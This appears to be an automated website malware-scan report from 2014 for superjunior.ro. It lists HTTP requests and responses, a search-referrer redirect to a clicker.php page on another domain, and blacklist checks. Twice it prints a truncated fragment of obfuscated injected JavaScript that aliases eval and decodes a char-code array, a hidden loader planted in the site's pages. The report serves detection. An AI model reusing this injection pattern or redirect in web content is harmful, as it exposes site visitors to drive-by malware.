Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://superjunior.ro/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: superjunior.ro Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 301 Moved Permanently Connection: close Date: Sun, 14 Sep 2014 09:52:23 GMT Location: http://coopmatrix.it/clicker.php Server: Apache Content-Length: 304 Content-Type: text/html; charset=iso-8859-1 | malicious |
Scanned pages/files
Request | Server response | Status |
http://superjunior.ro/ | 200 OK Content-Length: 31273 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below):
try{window.document.body++}catch(gdsgsdg){dbshre=247;}if(dbshre){asd=0;try{d=document.createElement("div");d.innerHTML.a="asd";}catch(agdsg){asd=1;}if(!asd){e=eval;}ss=String;asgq=new Array(31,94,110,104,94,107,97,104,104,27,31,33,25,117,8,1,24,25,26,27,109,89,107,26,104,97,24,54,26,95,102,91,110,103,96,101,108,39,93,109,92,89,109,95,64,99,93,102,95,105,107,32,32,99,97,105,89,102,95,34,32,51,6,4,8,1,24,25,26,27,100,98,39,109,109,90,24,54,26,34,95,108,109,106,53,38,39,92,105,106,103,101,90,110,10
Antivirus reports:
http://www.google-analytics.com/urchin.js | 200 OK Content-Length: 22678 Content-Type: text/javascript | clean |
http://superjunior.ro/Scripts/swfobject_modified.js | HTTP/1.1 302 Moved Temporarily Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Sun, 14 Sep 2014 09:52:25 GMT Pragma: no-cache Location: http://www.superjunior.ro/index.php?m=7 Server: Apache Vary: Accept-Encoding Content-Type: text/html Expires: Thu, 19 Nov 1981 08:52:00 GMT Set-Cookie: PHPSESSID=dvdrljqt3tu4hmb5u8hv35o6h0; path=/ Set-Cookie: stats=446501053769c06c565094b26d26e8ef; expires=Sun, 14-Sep-2014 12:52:25 GMT | clean |
http://www.superjunior.ro/index.php?m=7 | 200 OK Content-Length: 34599 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below):
try{window.document.body++}catch(gdsgsdg){dbshre=247;}if(dbshre){asd=0;try{d=document.createElement("div");d.innerHTML.a="asd";}catch(agdsg){asd=1;}if(!asd){e=eval;}ss=String;asgq=new Array(31,94,110,104,94,107,97,104,104,27,31,33,25,117,8,1,24,25,26,27,109,89,107,26,104,97,24,54,26,95,102,91,110,103,96,101,108,39,93,109,92,89,109,95,64,99,93,102,95,105,107,32,32,99,97,105,89,102,95,34,32,51,6,4,8,1,24,25,26,27,100,98,39,109,109,90,24,54,26,34,95,108,109,106,53,38,39,92,105,106,103,101,90,110,10
Antivirus reports:
http://www.superjunior.ro/Scripts/swfobject_modified.js | HTTP/1.1 302 Moved Temporarily Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Sun, 14 Sep 2014 09:52:27 GMT Pragma: no-cache Location: http://www.superjunior.ro/index.php?m=7 Server: Apache Vary: Accept-Encoding Content-Type: text/html Expires: Thu, 19 Nov 1981 08:52:00 GMT Set-Cookie: PHPSESSID=6ai9vumvpr3r8mh0eq47l8qrh4; path=/ Set-Cookie: stats=446501053769c06c565094b26d26e8ef; expires=Sun, 14-Sep-2014 12:52:27 GMT | clean |
http://www.superjunior.ro/test404page.js | HTTP/1.1 302 Moved Temporarily Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Sun, 14 Sep 2014 09:52:29 GMT Pragma: no-cache Location: http://www.superjunior.ro/index.php?m=7 Server: Apache Vary: Accept-Encoding Content-Type: text/html Expires: Thu, 19 Nov 1981 08:52:00 GMT Set-Cookie: PHPSESSID=qu4tuimqfit2nt6g1124g9eda7; path=/ Set-Cookie: stats=446501053769c06c565094b26d26e8ef; expires=Sun, 14-Sep-2014 12:52:29 GMT | clean |
http://superjunior.ro/Scripts/servicecall.js | HTTP/1.1 302 Moved Temporarily Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Sun, 14 Sep 2014 09:52:30 GMT Pragma: no-cache Location: http://www.superjunior.ro/index.php?m=7 Server: Apache Vary: Accept-Encoding Content-Type: text/html Expires: Thu, 19 Nov 1981 08:52:00 GMT Set-Cookie: PHPSESSID=ee5a910l3900sd74ccevbkg195; path=/ Set-Cookie: stats=446501053769c06c565094b26d26e8ef; expires=Sun, 14-Sep-2014 12:52:30 GMT | clean |
http://superjunior.ro/Scripts/functions.js | HTTP/1.1 302 Moved Temporarily Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Sun, 14 Sep 2014 09:52:31 GMT Pragma: no-cache Location: http://www.superjunior.ro/index.php?m=7 Server: Apache Vary: Accept-Encoding Content-Type: text/html Expires: Thu, 19 Nov 1981 08:52:00 GMT Set-Cookie: PHPSESSID=5ln0fo5uh4p0d6lemtlblsc9d1; path=/ Set-Cookie: stats=446501053769c06c565094b26d26e8ef; expires=Sun, 14-Sep-2014 12:52:31 GMT | clean |
http://storage.trafic.ro/js/trafic.js | 200 OK Content-Length: 204 Content-Type: application/x-javascript | clean |
http://superjunior.ro/Scripts/../../functions.js | HTTP/1.1 302 Moved Temporarily Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Sun, 14 Sep 2014 09:52:33 GMT Pragma: no-cache Location: http://www.superjunior.ro/index.php?m=7 Server: Apache Vary: Accept-Encoding Content-Type: text/html Expires: Thu, 19 Nov 1981 08:52:00 GMT Set-Cookie: PHPSESSID=j4n065ottsoh97kpuq48b3il10; path=/ Set-Cookie: stats=446501053769c06c565094b26d26e8ef; expires=Sun, 14-Sep-2014 12:52:33 GMT | clean |
http://superjunior.ro/servicecall.js | 200 OK Content-Length: 3177 Content-Type: text/javascript | clean |
http://superjunior.ro/functions.js | 200 OK Content-Length: 1205 Content-Type: text/javascript | clean |
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=superjunior.ro
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://superjunior.ro/
Result: superjunior.ro is not infected or malware details are not published yet.